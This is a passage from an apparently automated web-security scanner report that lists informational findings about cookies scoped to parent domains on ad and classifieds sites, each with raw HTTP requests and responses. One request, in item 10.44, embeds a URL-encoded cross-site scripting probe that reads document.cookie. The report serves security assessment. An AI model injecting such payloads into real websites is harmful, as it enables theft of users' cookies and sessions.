The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/c5/jsc/fmr.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 956
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=562
Expires: Fri, 28 Jan 2011 16:54:00 GMT
Date: Fri, 28 Jan 2011 16:44:38 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo
...[SNIP]...

10.43. http://cbs6albany.oodle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cbs6albany.oodle.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

otu=4cb1554b3fac0f3130b9462891294fa6; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
ots=9071808584648e0860c7c6ca699e90c4; path=/; domain=.oodle.com
a=dT1GNDQ0QTkwNTRENDNBNDg3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
multivariate=YToyOntzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJfdGltZXN0YW1wIjtpOjEyOTYyNzg2NjM7fQ%3D%3D; path=/; domain=.oodle.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: cbs6albany.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Sat, 29 Jan 2011 05:24:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: otu=4cb1554b3fac0f3130b9462891294fa6; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=9071808584648e0860c7c6ca699e90c4; path=/; domain=.oodle.com
Set-Cookie: a=dT1GNDQ0QTkwNTRENDNBNDg3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: multivariate=YToyOntzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJfdGltZXN0YW1wIjtpOjEyOTYyNzg2NjM7fQ%3D%3D; path=/; domain=.oodle.com
Content-Length: 101595

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...

10.44. http://cbs6albany.oodle.com/pro/fb-follow/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cbs6albany.oodle.com
Path:	/pro/fb-follow/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

multivariate=YToyOntzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJfdGltZXN0YW1wIjtpOjEyOTYzMTEyNTM7fQ%3D%3D; path=/; domain=.oodle.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pro/fb-follow/?url=http%3A%2F%2Fcbs6albany.oodle.com%2F%3F2ba1c%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E0fdede783fa%3D1 HTTP/1.1
Host: cbs6albany.oodle.com
Proxy-Connection: keep-alive
Referer: http://cbs6albany.oodle.com/?2ba1c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E0fdede783fa=1
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: otu=ce87321bc657a3f6e2854f05d3721d95; ots=6c54c2e4af9e0e7ad3ee741dc7b34b67; a=dT1DMDU2MEIyMzRENDQyM0FF; multivariate=YToyOntzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJfdGltZXN0YW1wIjtpOjEyOTYzMTEyMTQ7fQ%3D%3D; cmTPSet=Y; CoreID6=18691534500812963112423; __qca=P0-987795237-1296311242367; 90184176_clogin=l=1296311242&v=1&e=1296314842664

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: no-cache, no-store
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Expires: -1
Content-Type: text/html; charset=utf-8
Date: Sat, 29 Jan 2011 14:27:34 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: multivariate=YToyOntzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJfdGltZXN0YW1wIjtpOjEyOTYzMTEyNTM7fQ%3D%3D; path=/; domain=.oodle.com
Content-Length: 1397

{"profile_html":"<div class=\"profile-polaroid\">\n\t<div class=\"profile-polaroid-pic\">\n\t\t\t<img src=\"http:\/\/i.oodleimg.com\/a\/account\/facebook_silhouette.gif\" width=\"50\" height=\"50\"\/>
...[SNIP]...

10.45. http://d7.zedo.com/OzoDB/cutils/R52_9/jsc/1302/egc.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/OzoDB/cutils/R52_9/jsc/1302/egc.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:0,0|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,0;expires=Sun, 27 Feb 2011 17:26:43 GMT;path=/;domain=.zedo.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OzoDB/cutils/R52_9/jsc/1302/egc.js HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 6
Content-Type: application/x-javascript
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:0,0|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,0;expires=Sun, 27 Feb 2011 17:26:43 GMT;path=/;domain=.zedo.com;
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
X-Varnish: 2848445226
Cache-Control: max-age=2330250
Expires: Thu, 24 Feb 2011 16:44:13 GMT
Date: Fri, 28 Jan 2011 17:26:43 GMT
Connection: close

10.46. http://d7.zedo.com/OzoDB/cutils/R52_9/jsc/951/egc.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/OzoDB/cutils/R52_9/jsc/951/egc.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021:0,0|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:14,26,1:10,26,1:0,26,0;expires=Mon, 28 Feb 2011 05:25:30 GMT;path=/;domain=.zedo.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OzoDB/cutils/R52_9/jsc/951/egc.js HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; aps=2; ZFFAbh=749B826,20|1483_759#365; FFad=32:15:42:23:13:18:2:1:1:0; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:29,26,1:21,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; FFcat=826,187,14:951,11,14:826,187,9:951,7,9:951,7,14:951,2,9:951,2,14:826,187,7:951,7,7:1220,101,9; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:14,26,1:10,26,1; FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 6
Content-Type: application/x-javascript
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021:0,0|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:14,26,1:10,26,1:0,26,0;expires=Mon, 28 Feb 2011 05:25:30 GMT;path=/;domain=.zedo.com;
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
X-Varnish: 2884195688
Cache-Control: max-age=2286960
Expires: Thu, 24 Feb 2011 16:41:30 GMT
Date: Sat, 29 Jan 2011 05:25:30 GMT
Connection: close

10.47. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

FFpb=1220:4f791'$951:appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=826,187,9:951,2,9:826,187,14:951,7,14:951,11,14:951,7,9:951,2,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFad=20:10:11:4:5:9:0:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:6,26,1:1,26,1;expires=Sun, 27 Feb 2011 23:16:42 GMT;path=/;domain=.zedo.com;
FFgeo=5386156;expires=Sat, 28 Jan 2012 23:16:42 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.4060885983053595 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; FFgeo=5386156; aps=2; ZFFAbh=749B826,20|1483_759#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:6,26,1:0,26,1; FFpb=1220:4f791'$951:appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,14:951,7,14:826,187,9:951,2,9:951,11,14:951,7,9:951,2,14:826,187,7:951,7,7:1220,101,9; FFad=11:4:19:9:5:9:0:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:7,26,1:6,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:2,26,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,2,9:826,187,14:951,7,14:951,11,14:951,7,9:951,2,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=20:10:11:4:5:9:0:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:6,26,1:1,26,1;expires=Sun, 27 Feb 2011 23:16:42 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFgeo=5386156;expires=Sat, 28 Jan 2012 23:16:42 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=128
Expires: Fri, 28 Jan 2011 23:18:50 GMT
Date: Fri, 28 Jan 2011 23:16:42 GMT
Connection: close
Content-Length: 2313

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='appnexus300x
...[SNIP]...

10.48. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=826,187,9:951,7,9:826,187,14:951,11,14:951,7,14:951,2,9:951,2,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFad=58:30:43:20:19:27:2:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:30,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1;expires=Mon, 28 Feb 2011 03:21:37 GMT;path=/;domain=.zedo.com;
FFgeo=5386156;expires=Sun, 29 Jan 2012 03:21:37 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.3788897015620023 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZCBC=1; aps=2; ZFFAbh=749B826,20|1483_759#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647,196646:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:14,26,1:14,26,1; PI=h1037004Za883604Zc826000187,826000187Zs173Zt128; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:43,26,1:30,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,14:951,11,14:951,7,14:826,187,9:951,2,9:951,7,9:951,2,14:826,187,7:951,7,7:1220,101,9; FFad=43:20:19:57:27:29:2:1:1:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,7,9:826,187,14:951,11,14:951,7,14:951,2,9:951,2,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=58:30:43:20:19:27:2:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:30,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1;expires=Mon, 28 Feb 2011 03:21:37 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFgeo=5386156;expires=Sun, 29 Jan 2012 03:21:37 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=114
Expires: Sat, 29 Jan 2011 03:23:31 GMT
Date: Sat, 29 Jan 2011 03:21:37 GMT
Connection: close
Content-Length: 2537

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='spectrum728x
...[SNIP]...

10.49. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fmr.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 13:39:46 GMT;path=/;domain=.zedo.com;
FFcat=826,187,14:951,7,14;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647,196644:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 13:39:46 GMT;path=/;domain=.zedo.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=7/2&a=0&f=&n=951&r=13&d=14&q=&$=&s=2&z=0.05526216677390039 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
